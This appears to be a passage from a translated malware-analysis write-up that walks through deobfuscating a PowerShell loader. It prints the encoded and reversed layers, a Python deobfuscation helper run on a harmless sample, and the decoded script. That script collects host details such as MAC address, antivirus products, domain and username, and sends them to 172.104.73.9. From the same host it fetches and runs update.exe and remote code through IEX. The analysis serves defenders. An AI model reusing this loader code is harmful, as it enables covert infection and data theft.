Hjnzh0VBhaK7bbJ2620rZbbW+lsmW2nwIOwXILr168wx/lyO23w160YCWiGvLS1dV50pG1/5z7NzThvs9lqPfvpNf39CY8/bx9dLnMZJtFUCUIwDU0Cpv+CvgCX0g9m1FlZDTEqNfks3fOIGwICFGBUlrNhVu+8fYruj1+8On39Ff2ieKsA1nmzVgFcFtkCc8Sz3dTE1iti1d9/796yuKIJolcxR8Xiuyp4UFL0f0DhV2cK5yIrz10He/hTvyF+pYlui/m0Pn79pfb0miaxzWiOvuSuvqu8YPoBuT9riwlAfELyRIhdujepf36Zftr3myYrT4yEWTCCKahLABjYZUZYMvjLjD+YZgvzCf36C6U5kVOoD0r2OJK+vQB/84i/L6rxe2gJ5qzK8Wo1+2lwJLFOj2cUWFypE6P9Ps+e/hT4Zud++tknKWNrZENYH9y0FNb/Rfn2LRTo+vpimZ1fLKvZev4DZn0CYbm/w/yMTMPdErL801kHhyj1DnN19ZVM8fcvqd33zGsdtD/5BN+mh+1yXZ2MtVFbskqTb3bQFf22VVfn+tIuDeCCxJ3oIFNKv2ydf/kuny3PxvkiW47vbJHxfNOCQT9XqDQYvE1fv7jOylVTwFBN1zOiR7Oui58s2uWxYZQ9YvVlfnLdFtCgr2mq2qqqiTzZqgGALisRio0lx52T4y9IH1Hf2epdrk2rbfpR5g3RHF/XOanSb2+nl83J9qKqn9HEXC6rE0zJbto2dXG+ne6mq+Lta2sX8D7G85ra/OTrk/TLZ3dTSGC2aPMLYCC82uE44StBTr+id8Jv/S+/9/HW1p2Pf++PP/n+vd3vPT17Xp7Om9/tk+/T74X8Tk7YGG7YYfoL062ti8v0428tZq++9fGd8TL7Iv/evdHu7mjv+9s/XRUvPv74Trq1/Z0vixf0Unpx2m6ftaeLNP3JrC6OnzzPHxm/7s74J7PnX51+D2Mej7e3btV6XJ6+uHgzv
5N+P73zGyf/Dw=={0})))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
Decoding further, we find the following content:
seT-VaRIablE3oVYAr( " ) )93]Rahc[]GNIRTS[,)25]Rahc[+84]Rahc[+35]Rahc[((EcAlper.)'|','PwU'(EcAlper.)'$',)911]Rahc[+211]Rahc[+08]Rahc[((EcAlper.)29]Rahc[]GNIRTS[,)001]Rahc[+601]Rahc[+711]Rahc[((EcAlper.)43]Rahc[]GNIRTS[,'M4K'(EcAlper.)' }{hctac} elif epyt- htapwpP'+' metI-weN {yrt }{hctac} } )M4K2daoln'+'wod'+'wpPM4K(gnirtSdaolnwoD'+'.)tneilCbeW.teN tcejbO-weN( XEI {esle} )M4K3daolnwodwpPM4K(gnirtsdaolnwod.)tneilCbeW.teN tcejbO-'+'weN( XEI yekwpP + eziswpP + M4K=ezis&M4K + sutatS.)sutatS ytreporP- troS PwU revirdD ecivreS-teG( + M4K3?nosj.wen/9.37.401.271//:ptthM4K = 3daolnwodwpP )04*0001(peelS::]daerhT.gnidaerhT.metsyS[ ;)pmt_daolnwodwpP(etucexellehs.cexewpP ;noitacilppa.llehs '+'moc- tcejbO-weN = cexewpP mus.)mus- htgnel ytreporp- '+'tcejbO-erusaeM PwU esrucer- pmt_daolnwodwpP metIdlihC-teG( = eziswpP )01*0001(peelS::]daerhT.gnidaerh'+'T.metsyS[ )M4Kpmt_daolnwodwpPM4K,M4Kdaolnwo'+'dwpPM4K(eliFda'+'olnwoD.)tneilCbeW.teN.metsyS'+' tcejbO-weN( {)))htapwpP htap-tset( ton-( dna- )M4Kgninn'+'uRM4K en- s'+'utatS.)sutatS ytreporP- troS PwU revir'+'dD ecivreS-teG(((fi {yrt 405exe.etadpudju405+M4Kpmet:vnewpPM4K = pmt_dao'+'lnwodwpP yekwpP + M'+'4K3?'+'nosj.dlo/9.37.401.271//:ptthM4K '+'= 2daolnwodwpP yekwpP + M4K3?exe.lld/9.37.401.271//:ptthM4K = daolnwodwpP EM'+'ANRESU'+':vnewpP + M4K=resu&M4K + niamoD.)metsysretupmoc_23niw tc'+'ejbOimW-teG( +'+' '+'M4K=niamod&M4K + galfwpP + M4K=2galf&M4K + erutcetihcrASO.)metsySgnitarepO_23niW tcejbOimW-teG(+M4K=tib&M4K+noisrev.)metsySgn'+'itare'+'pO_23niW ssalC- tcejbOimW-teG(+'+'M4K'+'=rev&M4K+vawpP+M4K=va&M4K+camwpP+M4K=cam&M4K'+' = yekwpP htapwpP htap-tset = ga'+'lfwpP]gnirts[ M4Kgol.ppdj'+'udjupmet:vnewpPM4K = htapwpP }{hctac} } 405YFDZ'+'405 =+ vawpP {)M4Kgni'+'nnuRM4K qe- sutatS.)sutatS ytreporP- troS PwU uygnafgnoduhz eciv'+'reS-teG((fi {yrt } svawpP = vawpP {esle} } M4KP'+'wUM4K + ]vwpP[svawpP =+ vawpP {)++vwpP ;tnuoC.svawpP tl- '+'vwpP ;0 = vwpP(rof {)1- tg- )405tcejbO405(fOxednI.eman.)(epyTt'+'eG.svawpP(fi 
emaNyalpsid.)tcudorPsuriVitnA ssalC- 2retneCytiruceSdjutoor ecapsemaN- tcejbOimW-teG( = svawpP )CAM dn'+'apxe- tcejbo-tcelesPwUCAM redaeH- vsC-morFtrevnoC PwU1 tsrif- 1 pikS- tcejbO-tcel'+'eSPwUVSC OF/ c'+'amteg( = camwpP]gnirts[ M4KM4K = svawpP]gnirts'+'[ M4KM4K = vawpP]gnirts['(()'X'+]31[DILlEhs$+]1[DiLlEhs$ ( . " ); & ((gv '*mdR*').naMe[3,11,2]-joiN'') (-JOiN (gEt-ItEmVariABLe:3oVYAr).VaLUE[- 1 ..-((gEt-ItEmVariABLe:3oVYAr).VaLUE.lENgTh) ] )
Focus on this part. I can't read it either, but roughly it reverses the string. OK, let's try that.
The result is as follows:
$av = ""
$avs = ""
$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
    for($v = 0; $v -lt $avs.Count; $v++){
        $av += $avs[$v] + "|"
    }
}else{
    $av = $avs
}
try{
    if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
        $av += 'ZDFY'
    }
}catch{}
$path = "$env:temp\\pp.log"
[string]$flag = test-path $path
$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME
$download = "http://172.104.73.9/dll.exe?3" + $key
$download2 = "http://172.104.73.9/old.json?3" + $key
$download_tmp = "$env:temp"+'\update.exe'
try{
    if(((Get-Service Ddriver | Sort -Property Status).Status -ne "Running") -and (-not (test-path $path))){
        (New-Object System.Net.WebClient).DownloadFile("$download","$download_tmp")
        [System.Threading.Thread]::Sleep(1000*10)
        $size = (Get-ChildItem $download_tmp -recurse | Measure-Object -property length -sum).sum
        $exec = New-Object -com shell.application; $exec.shellexecute($download_tmp);
        [System.Threading.Thread]::Sleep(1000*40)
        $download3 = "http://172.104.73.9/new.json?3" + (Get-Service Ddriver | Sort -Property Status).Status + "&size=" + $size + $key
        IEX (New-Object Net.WebClient).downloadstring("$download3")
    }else{
        IEX (New-Object Net.WebClient).DownloadString("$download2")
    }
}catch{}
try{
    New-Item $path -type file
}catch{}
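The three decoding stages walked through above (the -f index shuffle that the py script undoes, the outer -f[ChAR]39,[ChAR]36 substitution, and the reversal of the stored string) as one added, general-purpose Python example; this is not code from the post. It runs on a small constructed stand-in that has the same shape as the loader rather than on the live blob, and it assumes the default %COMSPEC% path when resolving $Env:COMSpEc[4,15,25]. (gv '*mdR*').Name resolves to the built-in MaximumDriveCount variable, whose characters [3,11,2] spell the same verb; both lookups are included. Feeding the first-layer blob above to decode_format_layer should reproduce the author's result, with the {0}/{1} placeholders additionally resolved to ' and $.

```python
"""Added example (not from the original post): the three decoding stages the
cloud-hosted loader chains, written as reusable helpers.

Stage 1: "{4}{28}..." -f 'a','b',...   (argument order scrambled by index)
Stage 2: ( ... )-f[ChAR]39,[ChAR]36     (leftover {0}/{1} become ' and $)
Stage 3: $var.Value[-1..-$var.Value.Length] (the script is stored reversed)
"""
import re

# Assumed default %COMSPEC%; the loader builds its verb by indexing into it.
COMSPEC_DEFAULT = r"C:\Windows\system32\cmd.exe"


def pick_chars(source: str, indices) -> str:
    """Resolve index tricks such as $Env:COMSPEC[4,15,25] -join ''."""
    return "".join(source[i] for i in indices)


def parse_format_expression(expr: str):
    """Split  "{n}{m}..." -f 'a','b',...  into (template, args, trailing text)."""
    head = re.search(r'"((?:\{\d+\})+)"\s*-f\s*', expr)
    if not head:
        raise ValueError("no -f format template found")
    rest = expr[head.end():]
    literal = re.compile(r"'((?:[^']|'')*)'")   # '' is an escaped quote in PowerShell
    args, pos = [], 0
    while True:
        lit = literal.match(rest, pos)
        if not lit:
            break
        args.append(lit.group(1).replace("''", "'"))
        pos = lit.end()
        comma = re.match(r"\s*,\s*", rest[pos:])
        if not comma:
            break
        pos += comma.end()
    return head.group(1), args, rest[pos:]


def unshuffle(template: str, args) -> str:
    """Emit the arguments in the order the {n} placeholders name them."""
    return "".join(args[int(i)] for i in re.findall(r"\{(\d+)\}", template))


def char_args(text: str) -> list:
    """Collect the characters an outer  -f[ChAR]39,[ChAR]36  supplies."""
    return [chr(int(n)) for n in re.findall(r"\[char\]\s*(\d+)", text, re.I)]


def fill_placeholders(text: str, values) -> str:
    """Replace {0},{1},... with values; str.format would trip on other braces."""
    if not values:
        return text
    return re.sub(r"\{(\d+)\}", lambda m: values[int(m.group(1))], text)


def decode_format_layer(expr: str) -> str:
    """Stages 1 and 2 together, one call per  ("{..}" -f ...)-f[ChAR]..  layer."""
    template, args, tail = parse_format_expression(expr)
    return fill_placeholders(unshuffle(template, args), char_args(tail))


def decode_reversed_layer(stored: str) -> str:
    """Stage 3: undo the [-1..-Length] slice that reads the string back to front."""
    return stored[::-1]


# Constructed stand-in for the loader's first layer (same shape, harmless body).
SAMPLE_LAYER1 = (
    ".( $Env:COMSpEc[4,15,25]-jOIn'')( (((\"{2}{0}{1}\" -f'Get-Date',"
    "' -Format {0}yyyy{0}','{1}d = '))-f[ChAR]39,[ChAR]36) )"
)
# Constructed stand-in for the reversed inner layer.
SAMPLE_LAYER3 = "'yyyy' tamroF- etaD-teG = d$"

if __name__ == "__main__":
    print(pick_chars(COMSPEC_DEFAULT, [4, 15, 25]))       # verb hidden in $Env:COMSPEC
    print(pick_chars("MaximumDriveCount", [3, 11, 2]))    # verb hidden in (gv '*mdR*').Name
    print(decode_format_layer(SAMPLE_LAYER1))
    print(decode_reversed_layer(SAMPLE_LAYER3))
```

The inner layer in this sample also runs a chain of .replace() calls (M4K, PwU, Ppw, ujd and 504 standing in for ", |, $, \ and '); those are ordinary string replacements applied after decode_reversed_layer, in the order the reversed text lists them.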
Roughly, it collects the MAC address, AntiVirusProduct (the names of the AV products installed locally) and whether a 360 product is installed, i.e. zhudongfangyu.
It also collects the OS version, bitness, computer name, username and so on, concatenates them into the request parameters and requests the exe and json downloads. The address in the sample is http://172.104.73.9/dll.exe , but it is no longer reachable.
It checks whether the Ddriver service is running; if it is, nothing is downloaded. The downloaded file should be named update.exe, which is then executed. Anyway, this code is simple, and I've already stripped the obfuscation for everyone.
That's all there is to the cloud-hosted sample. Since it is no longer accessible, I can't analyse it further.